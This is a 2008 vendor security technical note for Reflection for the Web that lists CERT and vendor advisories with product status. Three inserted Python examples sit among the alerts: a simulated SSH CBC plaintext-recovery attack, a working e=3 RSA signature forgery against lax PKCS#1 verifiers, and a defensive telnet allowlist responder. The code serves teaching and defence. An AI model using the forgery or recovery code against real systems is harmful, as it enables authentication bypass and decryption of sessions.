
Security Updates and Reflection for the Web
Technical Note 1704
Last Reviewed 21-Nov-2008
Applies To
Reflection for the Web 2008 (All Editions)
Reflection for the Web version 8.0 through 9.6
Summary

This technical note discusses security issues related to Reflection for the Web. If you use this product, consult this technical note regularly for updated information.

IMPORTANT: The security for Reflection for the Web depends upon the security of the operating system, host, and network environment. We strongly recommend that you evaluate and implement all relevant security service packs, updates, and patches recommended by your operating system, host, Java Virtual Machine, and network manufacturers.

This document is organized in the following sections:

Reflection for the Web and Security
Reporting a Potential Security Vulnerability to Attachmate
Current Version
Product Updates
Security Alerts and Advisories
Your Operating System and Virtual Machine Security Pages

Reflection for the Web and Security

This section provides information about security updates to Reflection for the Web security features, together with security fixes and known issues.

The following table lists security information regarding other Reflection products.

Product Name                                        Security Technical Note
All Reflection Products                             1700
Reflection for HP, Reflection for UNIX and OpenVMS,
Reflection for ReGIS Graphics, Reflection for IBM,
Reflection X, Reflection for Secure IT
Windows Client 6.x                                  1708
Reflection for Secure IT, F-Secure SSH              2288

Reporting a Potential Security Vulnerability to Attachmate

If you are aware of a potential security vulnerability in Attachmate's Reflection products that is not listed in this document, see Technical Note 1890 for details about reporting the issue to the Attachmate Computer Emergency Response Team (CERT).

Current Version

For information about the current version of Attachmate products, see the Product Support Lifecycle at http://support.attachmate.com/programs/lifecycle/.

Product Updates

To determine if any updates are available for the current version of your Reflection product, see Technical Note 1619, Reflection Patch Topics.

Security Alerts and Advisories

The following security alerts and advisories may affect your Reflection for the Web installation, or the security of your operating system or Java Virtual Machine. We recommend that you review these alerts and advisories.

Note: This information is non-inclusive—it does not attempt to address all security issues that may affect your system.

Alert
Vulnerability Advisory CPNI-957037
Date Posted
October 2008
Summary
A design flaw in the SSH protocol's use of block ciphers in cipher block chaining (CBC) mode could allow an attacker to recover up to four bytes of plaintext from an encrypted session. Although the severity of the attack is considered high, the likelihood of a successful attack is low, and an attempt, successful or not, terminates the user's SSH connection.
Product Status
For more information about how this vulnerability affects Attachmate products, see Technical Note 2398.
Additional Information
For details, see the Combined Security Incident Response Team - United Kingdom web site at http://www.cpni.gov.uk/Products/3716.aspx.
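The mechanism behind CPNI-957037, as an added simulation that is not part of this technical note or of Reflection: an SSH-style receiver decrypts the first CBC block of a packet, takes the 4-byte packet_length from it, reads that many more bytes, and only then checks the MAC. An attacker who replays an earlier ciphertext block as the start of a new packet learns, from how many bytes the receiver accepts before the MAC error, the first four bytes of that block's decryption XORed with the current chaining block; XORing again with the block that preceded it originally yields four plaintext bytes. The toy Feistel cipher, the HMAC-SHA1 framing, the keys, IV and traffic are all constructed for the example. With rig=False the replay meets the usual fate (the decrypted length fails the sanity check and the receiver closes the connection); rig=True has the harness use the key, which a real attacker does not have, to shape the padding of a second packet so the length check passes and the four bytes come out.

```python
# CPNI-957037 in miniature: CBC plaintext recovery against an SSH-style receiver
# (added simulation, not Reflection code; a toy Feistel cipher stands in for AES).
import hashlib
import hmac
import random

BLOCK, MAC_LEN, MAX_PACKET = 16, 20, 256 * 1024

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # toy round function
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):  # 4-round Feistel on 16-byte blocks; NOT a secure cipher
    l, r = block[:8], block[8:]
    for rnd in range(4):
        l, r = r, xor(l, _f(key, rnd, r))
    return r + l

def block_decrypt(key, block):
    r, l = block[:8], block[8:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r

def mac(mac_key, seq, packet):
    return hmac.new(mac_key, seq.to_bytes(4, "big") + packet, hashlib.sha1).digest()

class Sender:
    def __init__(self, key, mac_key, iv):
        self.key, self.mac_key, self.prev, self.seq = key, mac_key, iv, 0
    def send(self, payload, padding=None):  # -> (ciphertext blocks, tag); CBC state chains on
        pad = BLOCK - (5 + len(payload)) % BLOCK
        pad += BLOCK if pad < 4 else 0
        packet = (1 + len(payload) + pad).to_bytes(4, "big") + bytes([pad]) + payload
        packet += bytes(pad) if padding is None else padding
        tag, self.seq = mac(self.mac_key, self.seq, packet), self.seq + 1
        blocks = []
        for i in range(0, len(packet), BLOCK):
            self.prev = block_encrypt(self.key, xor(packet[i:i + BLOCK], self.prev))
            blocks.append(self.prev)
        return blocks, tag

class Receiver:  # decrypts the first block, trusts its length field, checks the MAC last
    def __init__(self, key, mac_key, iv):
        self.key, self.mac_key, self.prev, self.seq = key, mac_key, iv, 0
        self.buf, self.plain, self.need, self.alive = bytearray(), None, None, True
    def feed(self, data):
        self.buf += data
        if self.need is None:
            if len(self.buf) < BLOCK:
                return "waiting"
            first = bytes(self.buf[:BLOCK])
            p, self.prev = xor(block_decrypt(self.key, first), self.prev), first
            length = int.from_bytes(p[:4], "big")
            if length < 5 or length > MAX_PACKET or (length + 4) % BLOCK:
                self.alive = False
                return "disconnect: bad packet length"
            self.plain, self.need = bytearray(p), length + 4 + MAC_LEN
        if len(self.buf) < self.need:
            return "waiting"  # the leak: it keeps reading until `need` bytes have arrived
        for i in range(BLOCK, self.need - MAC_LEN, BLOCK):
            c = bytes(self.buf[i:i + BLOCK])
            self.plain, self.prev = self.plain + xor(block_decrypt(self.key, c), self.prev), c
        tag = bytes(self.buf[self.need - MAC_LEN:self.need])
        if not hmac.compare_digest(mac(self.mac_key, self.seq, bytes(self.plain)), tag):
            self.alive = False
            return "disconnect: MAC error"
        del self.buf[:self.need]
        self.seq, self.need = self.seq + 1, None
        return "ok"

def attack(receiver, wire, target_index):
    """Replay wire[target_index] (wire[0] is the IV) as the start of a new packet; the
    bytes accepted before the MAC error reveal (D_k(target) XOR wire[-1])[:4]. Returns
    the target's first 4 plaintext bytes, or None if the length check closed the link."""
    target, target_prev, c_last = wire[target_index], wire[target_index - 1], wire[-1]
    status, consumed = receiver.feed(target), BLOCK
    while status == "waiting":
        status, consumed = receiver.feed(b"\x00"), consumed + 1
    if status != "disconnect: MAC error":
        return None
    leaked = xor((consumed - 4 - MAC_LEN).to_bytes(4, "big"), c_last[:4])  # = D_k(target)[:4]
    return xor(leaked, target_prev[:4])

def run(seed=1, rig=True):
    """One secret packet (constructed) on the wire, then the replay of its second block.
    rig=False is what a real attacker gets: the length check almost always fails and the
    session ends. rig=True lets this harness, which knows the key, pick the padding of a
    second packet so that D_k(wire[2]) XOR last_block decodes to the valid length 28."""
    rng = random.Random(seed)
    key, mac_key, iv = (bytes(rng.randrange(256) for _ in range(16)) for _ in range(3))
    snd, rcv, wire = Sender(key, mac_key, iv), Receiver(key, mac_key, iv), [iv]
    blocks, tag = snd.send(b"USER alice\nPASS hunter2\n")
    wire += blocks
    assert rcv.feed(b"".join(blocks) + tag) == "ok"
    if rig:
        t = xor(block_decrypt(key, wire[2])[:4], (28).to_bytes(4, "big")) + bytes(12)
        head = (28).to_bytes(4, "big") + bytes([16]) + b"ls -la /tmp"
        pad = xor(block_decrypt(key, t), block_encrypt(key, xor(head, snd.prev)))
        blocks, tag = snd.send(b"ls -la /tmp", padding=pad)
        wire += blocks
        assert rcv.feed(b"".join(blocks) + tag) == "ok"
    return attack(rcv, wire, 2), rcv.alive  # rig=True: (b"PASS", False)
```

The receiver's state after either run is alive == False, which is the "terminates the user's SSH connection" outcome in the summary above; the fix deployed in SSH implementations was to stop acting on a decrypted length field before the MAC had been verified, or to move to CTR mode.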

Alert
US-CERT Vulnerability Note VU #419344
Date Posted
April 2007
Summary
An authenticated user may be able to execute arbitrary code on a host running kadmind. Successful exploitation can compromise the Kerberos key database and host security on the host running these programs. (kadmind and the KDC typically run as root.) Unsuccessful exploitation attempts will likely result in the affected program crashing. Third-party applications calling either the RPC library or the GSS-API library provided with MIT krb5 may be vulnerable.
Product Status
Attachmate products (including NetIQ products) are not vulnerable.
Additional Information
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/419344.

Alert
US-CERT Vulnerability Note VU #704024
Date Posted
April 2007
Summary
A buffer overflow exists in the krb5_klog_syslog() function used by kadmind and the KDC. An authenticated user may be able to execute arbitrary code on a host running kadmind or the KDC; a user controlling a Kerberos realm that shares a key with the target realm may also be able to execute arbitrary code on a KDC host. Successful exploitation can compromise the Kerberos key database and host security on the host running these programs (kadmind and the KDC typically run as root). Unsuccessful exploitation attempts will likely crash the affected program. Third-party applications calling krb5_klog_syslog() may also be vulnerable.
Product Status
Attachmate products (including NetIQ products) are not vulnerable.
Additional Information
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/704024.

Alert
US-CERT Vulnerability Note VU #220816
Date Posted
April 2007
Summary
A remotely-exploitable root vulnerability is present in an application which ships in the krb5 sources.
Product Status
Attachmate products (including NetIQ products) are not vulnerable.
Additional Information
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/220816.

Alert
US-CERT Vulnerability Note VU #831452: Kerberos administration daemon may free uninitialized pointers
Date Posted
April 2007
Summary
An unauthenticated user may cause execution of arbitrary code in the Kerberos administration daemon, "kadmind", by causing it to free uninitialized pointers which should have been initialized by the GSS-API library. Compromise of the Kerberos key database may result. Third-party server applications written using the GSS-API library provided with MIT krb5 may also be vulnerable. Affected releases are krb5-1.5 through krb5-1.5.1.
Product Status
Attachmate products (including NetIQ products) are not vulnerable.
Additional Information
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/831452.

Alert
US-CERT Vulnerability Note VU #845620
Date Posted
September 5, 2006
Summary
Multiple RSA implementations fail to properly handle signatures.
Product Status
Attachmate has determined that the usage of the RSA digital signature algorithm in Reflection for the Web is not subject to this vulnerability.
Additional Information
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/845620.
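VU#845620 concerned PKCS#1 v1.5 signature verifiers that located the DigestInfo after the 00 01 FF..FF 00 padding but did not insist that it end exactly at the end of the block; with a small public exponent such as 3, an attacker can then produce a "signature" that such a verifier accepts without ever touching the private key. The following added example (not Reflection code) shows the lax check beside the strict one and the forgery that tells them apart. The RSA key generation is a pure-Python toy with a seeded generator and no side-channel protection, the key size is 2048 bits so that the cube-root rounding error fits in the bytes a lax verifier ignores, and the message strings are constructed.

```python
"""Lax versus strict PKCS#1 v1.5 signature checking, with the e = 3 forgery from VU#845620.
Added example, not Reflection code; RSA here is a pure-Python toy."""
import hashlib
import hmac
import random

SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # DER header before a SHA-1 hash
SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47)

def is_probable_prime(n, rounds=16):
    """Trial division, then Miller-Rabin."""
    if n < 2 or any(n % p == 0 for p in SMALL_PRIMES):
        return n in SMALL_PRIMES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def make_key(bits=2048, e=3, seed=1):
    """Return (n, e, d); primes are chosen so that e is invertible mod (p-1)(q-1)."""
    rng = random.Random(seed)
    def prime():
        while True:
            cand = rng.getrandbits(bits // 2) | 1 << (bits // 2 - 1) | 1
            if (cand - 1) % e and is_probable_prime(cand):
                return cand
    p, q = prime(), prime()
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def emsa_pkcs1_v15(msg, k):
    """00 01 FF..FF 00 || DigestInfo(SHA-1(msg)), exactly k bytes."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def _decode(sig, n, e):
    """sig^e mod n as a k-byte block, or None if sig is out of range."""
    s, k = int.from_bytes(sig, "big"), (n.bit_length() + 7) // 8
    return pow(s, e, n).to_bytes(k, "big") if 0 < s < n else None

def verify_lax(msg, sig, n, e):
    """The flawed pattern: find the DigestInfo after the padding, ignore what follows."""
    em = _decode(sig, n, e)
    if em is None or em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= len(em) or em[i] != 0x00:  # at least 8 FF bytes, then 00
        return False
    return em[i + 1:].startswith(SHA1_DIGESTINFO + hashlib.sha1(msg).digest())

def verify_strict(msg, sig, n, e):
    """The fix: rebuild the whole expected block and compare every byte."""
    em = _decode(sig, n, e)
    return em is not None and hmac.compare_digest(em, emsa_pkcs1_v15(msg, len(em)))

def icbrt(x):
    """Floor of the cube root of a non-negative integer (Newton, from above)."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r
        r = nr

def forge(msg, n, e=3):
    """Signature for msg that verify_lax accepts, computed from (n, e) alone: every integer
    in [lo, lo + 2**junk_bits) starts with 00 01 FF*8 00 DigestInfo, and a cube root s of a
    cube in that range satisfies s**3 < n, so s**3 mod n == s**3 shows the lax verifier
    exactly the prefix it looks for."""
    assert e == 3, "needs a small public exponent"
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    junk_bits = 8 * (k - len(prefix))
    lo = int.from_bytes(prefix, "big") << junk_bits
    s = icbrt(lo + (1 << junk_bits) - 1)
    if s ** 3 < lo:
        raise ValueError("modulus too small for the forgery to fit")
    return s.to_bytes(k, "big")

def demo(seed=1):
    n, e, d = make_key(seed=seed)
    genuine, forged = sign(b"trusted.example", n, d), forge(b"attacker.example", n, e)
    return (verify_strict(b"trusted.example", genuine, n, e),
            verify_lax(b"trusted.example", genuine, n, e),
            verify_lax(b"attacker.example", forged, n, e),
            verify_strict(b"attacker.example", forged, n, e))  # (True, True, True, False)
```

The point for a reviewer of any PKCS#1 v1.5 verifier is the shape of verify_strict: it never parses the decoded block at all, it recomputes the one block a genuine signature must decode to and compares the whole thing.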

Alert
US-CERT Vulnerability Note VU#680620
Date Posted
July 14, 2005
Summary
Buffer overflow vulnerability in versions 1.2.1 and 1.2.2 of the zlib data compression library inflate() routine.
Product Status
Reflection for the Web does not use zlib and is not subject to this vulnerability.
Additional Information
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/680620.

Alert
Multiple iDEFENSE Security Advisories/US-CERT Vulnerability Note VU#800829
Date Posted
July 7, 2005
Summary
Multiple vendor telnet client information disclosure vulnerabilities.
Product Status
Reflection for the Web Telnet clients are not vulnerable to these issues: they return only limited terminal information in response to the NEW-ENVIRON (NEW_ENVIRONMENT) option's SEND request, and they build their replies in dynamically sized buffers rather than fixed-length ones.
Additional Information
For details about these vulnerabilities, see the iDefense and US-CERT articles listed below.
iDefense:
http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=220&type=vulnerabilities
http://www.idefense.com/application/poi/display?id=221&type=vulnerabilities
US-CERT:
http://www.kb.cert.org/vuls/id/800829
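What "limited terminal information" and "dynamically sized buffering" amount to in a client, as an added example that is not Reflection code: a NEW-ENVIRON (RFC 1572) responder that answers a server's SEND only from a fixed allowlist, drops requests for anything else instead of consulting the process environment, applies the option's quoting rules, and grows its reply buffer as needed. The option constants are the RFC's; the variable names, values and request bytes are constructed for the example.

```python
"""Telnet NEW-ENVIRON (RFC 1572) responder that discloses only an allowlist.
Added example, not Reflection code."""
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39
IS, SEND = 0, 1
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

# The only variables this client will ever reveal (constructed sample values);
# nothing here is ever looked up in os.environ.
ALLOWED = {(VAR, b"TERM"): b"vt100", (VAR, b"USER"): b"alice"}

def parse_send(subneg: bytes) -> list:
    """Parse the bytes between IAC SB and IAC SE of a NEW-ENVIRON SEND.

    Returns a list of (type, name) requests. An empty list means "send everything
    you are willing to"; an empty name means "all variables of that type".
    Raises ValueError on malformed input rather than guessing.
    """
    if len(subneg) < 2 or subneg[0] != NEW_ENVIRON or subneg[1] != SEND:
        raise ValueError("not a NEW-ENVIRON SEND subnegotiation")
    reqs, cur_type, name, i = [], None, bytearray(), 2
    while i < len(subneg):
        b = subneg[i]
        if b in (VAR, USERVAR):
            if cur_type is not None:
                reqs.append((cur_type, bytes(name)))
            cur_type, name = b, bytearray()
        elif b == VALUE:
            raise ValueError("VALUE is not allowed in a SEND")
        elif cur_type is None:
            raise ValueError("name bytes before a VAR/USERVAR type byte")
        else:
            if b == ESC:  # ESC quotes the next byte
                i += 1
                if i >= len(subneg):
                    raise ValueError("dangling ESC")
                b = subneg[i]
            name.append(b)
        i += 1
    if cur_type is not None:
        reqs.append((cur_type, bytes(name)))
    return reqs

def _quote(data: bytes) -> bytes:
    """NEW-ENVIRON quoting: ESC before VAR/VALUE/ESC/USERVAR bytes, IAC doubled."""
    out = bytearray()
    for b in data:
        if b in (VAR, VALUE, ESC, USERVAR):
            out.append(ESC)
        elif b == IAC:
            out.append(IAC)
        out.append(b)
    return bytes(out)

def build_is_reply(reqs: list) -> bytes:
    """Full IAC SB NEW-ENVIRON IS ... IAC SE reply, answering only from ALLOWED.

    Requests for anything else (LD_LIBRARY_PATH, USERVAR secrets, ...) are
    silently omitted from the reply.
    """
    if not reqs:
        items = list(ALLOWED.items())
    else:
        items = []
        for typ, name in reqs:
            if name == b"":
                items += [(k, v) for k, v in ALLOWED.items() if k[0] == typ]
            elif (typ, name) in ALLOWED:
                items.append(((typ, name), ALLOWED[(typ, name)]))
    reply = bytearray([IAC, SB, NEW_ENVIRON, IS])  # grows as needed; no fixed-size buffer
    for (typ, name), value in items:
        reply += bytes([typ]) + _quote(name) + bytes([VALUE]) + _quote(value)
    return bytes(reply + bytes([IAC, SE]))

def respond(subneg: bytes) -> bytes:
    """Wire-format reply for one SEND subnegotiation."""
    return build_is_reply(parse_send(subneg))
```

A server asking for TERM, LD_LIBRARY_PATH and a USERVAR named SECRET gets back TERM alone; a bare SEND gets the two allowlisted variables and nothing more.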

Alert
Sun(sm) Alert Notification - Document ID 101749
Summary
Java Runtime Environment security vulnerability.
Additional Information
This alert describes a Java Runtime Environment vulnerability that may enable an untrusted applet to increase its system privileges. For further details and links to Java updates, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-101749-1.

Alert
Sun(sm) Alert Notification - Document ID 101748
Summary
Java Web Start security vulnerability that may enable an untrusted application to increase its system privileges.
Additional Information
For further details and links to Java updates, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-101748-1.

Alert
Announcement of Successful Cryptanalytic Attack on SHA-1
Summary
Three Chinese cryptanalysts from Shandong University have recently documented a successful cryptanalytic attack on the SHA-1 algorithm.
Product Status
Reflection products primarily use SHA-1 to create HMACs (keyed hashes for message authentication) that verify message integrity. As Schneier notes in the blog posting at http://www.schneier.com/blog/archives/2005/02/sha1_broken.html, hash collisions are not the concern for this use: HMAC security does not rest on the collision resistance of the underlying hash (an attacker without the key cannot even compute the values that would need to collide), so this use of SHA-1 is not affected by the attack.
Over the next several product versions, vendors of products that use SHA-1, Attachmate included, will likely phase out SHA-1 for digital signatures and add support for SHA-256 and other stronger hash algorithms.

Additional Information
Bruce Schneier, the author of "Applied Cryptography," discusses this announcement on his blog, Schneier on Security. For commentary on this topic, see Mr. Schneier's blog at http://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html.

Alert
Sun(sm) Alert Notification - Document ID 57591
Summary
Security Vulnerability With Java Plug-in in JRE/SDK. This Java security vulnerability affects Sun's Java Virtual Machine (JVM) when it is used to run Java applets in a web browser on a client machine. If you have client machines using an affected version of the JVM to run Java applets in a web browser, we recommend that you download and install an updated version of the JVM (see the link under Additional Information).
Product Status
The Reflection management server is installed with Reflection for the Web and Reflection Administrator. The automated installer installs the management server with a private copy of a Sun Java Runtime Environment (JRE). In a default installation (using the automated installer), the JRE installed with Reflection cannot be invoked by a local web browser on the server machine to run a Java applet and is therefore not affected by the problem cited in this alert. However, if the JRE installation has been modified so that a local web browser on the server machine can invoke it to run a Java applet, or if untrusted Java software has been configured to use this JRE, we recommend that you download and install an updated version of the JRE (see the link under Additional Information).
Additional Information
For details, see http://sunsolve.sun.com/search/document.do?assetkey=1-26-57591-1.

Alert
US-CERT Technical Cyber Security Alert TA04-247A
Summary
The vulnerabilities described in Security Alert TA04-247A (VU#866472, VU#795632, VU#550464, and VU#350792) are not applicable to Reflection for the Web.
Additional Information
For details about this security alert, see http://www.us-cert.gov/cas/techalerts/TA04-247A.html.

Alert
US-CERT Technical Cyber Security Alert TA04-104A
Summary
Microsoft has released four security bulletins listing vulnerabilities that affect Microsoft Windows and its components.
Product Status
The vulnerabilities described in these bulletins are directly related to Microsoft products. However, because they may affect the Windows operating system or other software, Reflection for the Web may be indirectly impacted. Therefore, we recommend that users download and apply the critical update patch available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx.
Note: Patch MS04-011 replaces Microsoft patch MS04-007 described in US-CERT Advisory TA04-041A (see below).
Additional Information
For details, see http://www.us-cert.gov/cas/techalerts/TA04-104A.html.

Alert
US-CERT Technical Cyber Security Alert TA04-041A
Summary
Multiple Vulnerabilities in Microsoft ASN.1 Library.
Product Status
Reflection for the Web does not use the library identified by Microsoft as containing the ASN.1 vulnerability. However, this library can affect the Windows operating system or other software, which can affect Reflection for the Web. Therefore, we recommend that users download and apply the critical update patch available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx.
Additional Information
For details, see http://www.us-cert.gov/cas/techalerts/TA04-041A.html.

Alert
CERT Advisory CA-2003-26
Summary
Multiple Vulnerabilities in SSL/TLS Implementations.
Product Status
Attachmate has inspected Reflection for the Web and determined that it is not vulnerable to the issues addressed in this alert.
Additional Information
For details, see http://www.cert.org/advisories/CA-2003-26.html.

Alert
CERT Advisory CA-2002-36
Summary
Vulnerabilities in SSH2 Implementations from Multiple Vendors.
Product Status
Attachmate has tested Reflection for the Web with the provided test suite and found that it is not vulnerable to the SSH2 connection initialization, key exchange, and negotiation phase attacks.
Additional Information
For details, see http://www.cert.org/advisories/CA-2002-36.html.

Alert
CERT Advisory CA-2003-24
Summary
Buffer Management Vulnerability in OpenSSH.
Product Status
Reflection for the Web does not use OpenSSH and is not affected by this issue.
Additional Information
For details, see http://www.cert.org/advisories/CA-2003-24.html.

Alert
Microsoft Security Bulletin MS02-052
Summary
Microsoft Java Virtual Machine JDBC classes and code execution.
Product Status
If you are using Reflection for the Web version 5.0, review this bulletin.
Additional Information
For details, see http://www.microsoft.com/technet/security/bulletin/MS02-052.mspx.

Alert
Reflection for the Web version 5.1.068 - 5.1.530 and 6.0.111 - 6.01.514: LDAP vulnerability
Summary
There is a security vulnerability in the LDAP access control feature.
Product Status
Reflection for the Web versions 5.1.068 through 5.1.530 and 6.0.111 through 6.01.514 are affected. Versions 5.0 and earlier are not affected. Patches are no longer available for these product versions; we recommend upgrading to the current version.

To determine what version of Reflection for the Web you are running, log in to the Administrative WebStation, click Resources, and then click About Reflection for the Web.

Version 5.0: Reflection for the Web with SSL and Certificate Authority (CA) signed certificates.

For SSL, Reflection for the Web uses self-signed certificates by default, but it can also be configured to use CA-signed certificates. Validating a CA-signed certificate requires additional checks of the certificate chain's attributes, and the Reflection for the Web 5.0 security proxy server does not perform those checks.

This does not affect the Reflection for the Web management server. However, if you plan to use CA-signed certificates to encrypt sessions between the Reflection for the Web applets and the Reflection for the Web security proxy server, we recommend that you upgrade to version 5.1 or later before configuring Reflection in this manner.

Your Operating System and Virtual Machine Security Pages

This section provides links to security information found on the web sites of common operating systems and virtual machines that may be of interest for Reflection for the Web users. This information is non-inclusive—it does not include all operating systems, nor does it include all links to information that may impact the security of your operating system.

Apple: http://www.info.apple.com/usen/security/security_updates.html

Debian Linux: http://www.debian.org/security/

HP (Compaq): http://www1.itrc.hp.com/service/home/home.do (Note: This site requires registration.)

IBM: http://www-1.ibm.com/servers/eserver/support/zseries/

Microsoft: http://www.microsoft.com/technet/security/current.aspx

Red Hat Linux: https://www.redhat.com/security/

Sun Microsystems: http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec

Notice: This technical note is updated from time to time and is provided for informational purposes only. Attachmate makes no representation or warranty that the functions contained in our software products will meet your requirements or that the operation of our software products will be interruption or error free. Attachmate EXPRESSLY DISCLAIMS ALL WARRANTIES REGARDING OUR SOFTWARE INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.

Related Technical Notes
1619 Reflection Patch Topics
1700 Reflection Security Topics
1708 Security Updates and Reflection
1857 Best Practices for Configuring Reflection Secure Shell
1890 Reporting a Potential Security Vulnerability to Attachmate
2288 Security Updates and Reflection for Secure IT
2398 Attachmate Security Update for CSIRTUK Vulnerability #CPNI-957: Plaintext Recovery Attack Against SSH
